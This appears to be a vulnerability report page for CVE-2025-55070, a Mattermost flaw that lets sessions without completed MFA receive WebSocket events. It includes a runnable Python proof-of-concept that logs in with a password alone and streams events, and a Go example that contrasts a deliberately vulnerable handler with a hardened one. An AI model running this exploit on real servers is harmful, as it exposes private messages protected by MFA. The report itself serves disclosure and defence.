Security Vulnerability Report
CVE-2025-55070 CVSS 6.5 MEDIUM

Published: 2025-11-14 08:15:46
Last Modified: 2025-11-17 17:51:06

Description

Mattermost versions <11 fail to enforce multi-factor authentication on WebSocket connections, which allows users who have not completed MFA to access sensitive information via WebSocket events. In other words, the MFA check that the REST API applies to a session is not applied when that same session opens the event WebSocket, so a session that is still pending its second factor can receive the events pushed to the user.

CVSS Details

CVSS Score (vendor, mattermost)
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVSS Score (NVD primary)
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Weakness
CWE-306 (Missing Authentication for Critical Function)

The two scorings differ only in Privileges Required: the vendor rates it PR:L (the attacker holds a password-authenticated session that has not completed MFA), while NVD rates it PR:N, matching the "unauthenticated" wording of the description. Both agree on the impact: high confidentiality loss, no integrity or availability impact.

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE
Mattermost Server, all versions before 11.0.0 (versionEndExcluding 11.0.0); 11.0.0 and later are not affected.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-55070 PoC - Mattermost WebSocket MFA Bypass
# This PoC demonstrates connecting to the Mattermost WebSocket without MFA verification.
# Requires the websocket-client and requests packages.
import json

import requests
import websocket

# Configuration
MATTERMOST_URL = "https://mattermost.example.com"
USERNAME = "[email protected]"
PASSWORD = "password123"


def get_auth_token():
    """Log in with username and password only and return the session token.

    The token is returned in the Token response header of /api/v4/users/login.
    """
    session = requests.Session()
    login_data = {"login_id": USERNAME, "password": PASSWORD}
    resp = session.post(f"{MATTERMOST_URL}/api/v4/users/login", json=login_data)
    if resp.status_code == 200:
        return resp.headers.get("Token"), session
    return None, None


def connect_websocket_without_mfa(token):
    """Open the event WebSocket with a session that has not completed MFA."""
    ws_url = MATTERMOST_URL.replace("https", "wss", 1) + "/api/v4/websocket"
    ws = websocket.create_connection(
        ws_url,
        header={
            "Authorization": f"Bearer {token}",
            "Origin": MATTERMOST_URL,
        },
    )
    # Send the WebSocket authentication challenge carrying the same session token
    auth_msg = json.dumps({
        "seq": 1,
        "action": "authentication_challenge",
        "data": {"token": token},
    })
    ws.send(auth_msg)
    print("[*] WebSocket connection established (MFA not enforced)")
    print("[*] Listening for sensitive events...")
    # Print every event the server pushes on this connection until it closes
    while True:
        try:
            event = json.loads(ws.recv())
            print(f"[EVENT] {json.dumps(event, indent=2)}")
        except (websocket.WebSocketException, ValueError) as exc:
            print(f"[!] Connection closed: {exc}")
            break
    ws.close()


if __name__ == "__main__":
    token, session = get_auth_token()
    if token:
        connect_websocket_without_mfa(token)
    else:
        print("[!] Login did not return a session token")
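The PoC above exercises the client side. The following Go example, added here and not taken from Mattermost's code base, models the server-side gate that the description says is missing: a WebSocket upgrade handler that authenticates the session but never asks whether MFA has been satisfied, beside a hardened handler that applies the same MFA check the REST layer would. All names (Session, Config, MfaRequired, sessionFromRequest, probe) and the token table are hypothetical; the config field is named after Mattermost's ServiceSettings.EnforceMultifactorAuthentication setting but the check itself is illustrative. The handler returns 200 where a real server would complete the upgrade.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Session is a minimal model of a server session (illustrative, not Mattermost's type).
type Session struct {
	UserID    string
	MfaActive bool // true once the session has completed a second factor
}

// Config holds the single setting this example cares about.
type Config struct {
	EnforceMultifactorAuthentication bool
}

// Constructed test data: bearer tokens mapped to sessions. "tok-mfa-pending" is a
// password-only login under enforced MFA, the situation the advisory describes.
var sessions = map[string]*Session{
	"tok-mfa-done":    {UserID: "alice", MfaActive: true},
	"tok-mfa-pending": {UserID: "bob", MfaActive: false},
}

// sessionFromRequest resolves the Authorization: Bearer header to a session, or nil.
func sessionFromRequest(r *http.Request) *Session {
	const prefix = "Bearer "
	auth := r.Header.Get("Authorization")
	if !strings.HasPrefix(auth, prefix) {
		return nil
	}
	return sessions[strings.TrimPrefix(auth, prefix)]
}

func isWebSocketUpgrade(r *http.Request) bool {
	return strings.EqualFold(r.Header.Get("Upgrade"), "websocket")
}

// MfaRequired reports whether a session must still complete MFA before using the API.
func MfaRequired(cfg Config, s *Session) bool {
	return cfg.EnforceMultifactorAuthentication && !s.MfaActive
}

// vulnerableWebSocketHandler mirrors the flaw: the session is authenticated,
// but the MFA state of that session is never consulted.
func vulnerableWebSocketHandler(cfg Config) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		s := sessionFromRequest(r)
		if s == nil || !isWebSocketUpgrade(r) {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		fmt.Fprintf(w, "event stream for %s\n", s.UserID) // real server upgrades here
	})
}

// hardenedWebSocketHandler applies the same MFA gate before allowing the upgrade.
func hardenedWebSocketHandler(cfg Config) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		s := sessionFromRequest(r)
		if s == nil || !isWebSocketUpgrade(r) {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		if MfaRequired(cfg, s) {
			http.Error(w, "mfa required", http.StatusUnauthorized)
			return
		}
		fmt.Fprintf(w, "event stream for %s\n", s.UserID)
	})
}

// probe sends an upgrade request with the given token and returns the HTTP status.
func probe(h http.Handler, token string) int {
	req := httptest.NewRequest(http.MethodGet, "/api/v4/websocket", nil)
	req.Header.Set("Authorization", "Bearer "+token)
	req.Header.Set("Upgrade", "websocket")
	req.Header.Set("Connection", "Upgrade")
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	cfg := Config{EnforceMultifactorAuthentication: true}
	for _, tok := range []string{"tok-mfa-done", "tok-mfa-pending", "bogus"} {
		fmt.Printf("%-16s vulnerable=%d hardened=%d\n", tok,
			probe(vulnerableWebSocketHandler(cfg), tok),
			probe(hardenedWebSocketHandler(cfg), tok))
	}
}
```

With enforcement on, the pending-MFA token gets 200 from the vulnerable handler and 401 from the hardened one; the MFA-complete token and the bogus token behave identically under both, which is the point: the fix changes nothing for properly authenticated users and only closes the path the PoC relies on.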

References

https://mattermost.com/security-updates (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55070", "sourceIdentifier": "[email protected]", "published": "2025-11-14T08:15:45.500", "lastModified": "2025-11-17T17:51:05.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions <11 fail to enforce multi-factor authentication on WebSocket connections which allows unauthenticated users to access sensitive information via WebSocket events"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "11.0.0", "matchCriteriaId": "0E0A9668-C657-425B-BD7E-D1A0CC5648A8"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}